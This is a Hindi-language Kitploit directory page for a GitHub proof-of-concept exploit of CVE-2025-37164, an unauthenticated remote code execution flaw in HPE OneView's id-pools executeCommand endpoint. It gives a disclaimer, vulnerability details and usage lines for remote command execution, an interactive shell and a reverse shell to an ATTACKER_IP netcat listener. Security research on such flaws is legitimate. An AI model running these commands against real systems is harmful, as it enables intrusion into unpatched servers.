Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-37164-PoC — CVE-2025-37164 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, HPE OneView में /rest/id-pools/executeCommand एंडपॉइंट के माध्यम से एक महत्वपूर्ण अनधिकृत दूरस्थ कोड निष्पादन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/g0vguy/cve-2025-37164-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

CVE-2025-37164 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, HPE OneView में /rest/id-pools/executeCommand एंडपॉइंट के माध्यम से एक महत्वपूर्ण अनधिकृत दूरस्थ कोड निष्पादन भेद्यता।

रिपॉजिटरी देखें
628 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-37164 - HPE OneView बिना प्रमाणीकरण के RCE PoC

CVE-2025-37164 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, HPE OneView में एक गंभीर (CVSS 10.0) बिना प्रमाणीकरण के रिमोट कोड निष्पादन कमजोरी।

अस्वीकरण

यह सॉफ्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • लेखक इस उपकरण द्वारा किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है
  • यह उपकरण नियंत्रित वातावरण में रक्षात्मक सुरक्षा अनुसंधान और प्रवेश परीक्षण के लिए है

कमजोरी के विवरण

  • CVE आईडी: CVE-2025-37164
  • CVSS स्कोर: 10.0 (गंभीर)
  • विक्रेता: Hewlett Packard Enterprise (HPE)
  • उत्पाद: HPE OneView (संस्करण 11.0 से पहले)
  • प्रकार: बिना प्रमाणीकरण के रिमोट कोड निष्पादन
  • पैच: HPE OneView 11.0 या उच्चतर में अपग्रेड करें

तकनीकी विश्लेषण: कमजोरी PUT /rest/id-pools/executeCommand एंडपॉइंट में मौजूद है जिसे प्रमाणीकरण की आवश्यकता नहीं है और यह उपयोगकर्ता-नियंत्रित इनपुट को सीधे Runtime.exec() को पास करता है।

पूर्वापेक्षाएँ

  • Python 3.6+
  • requests लाइब्रेरी (pip install requests)
  • कमजोर HPE OneView इंस्टेंस (जिसमें 'id pools' सुविधा सक्षम हो)

उपयोग

root@kitploit:~
# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
टूल डाउनलोड करें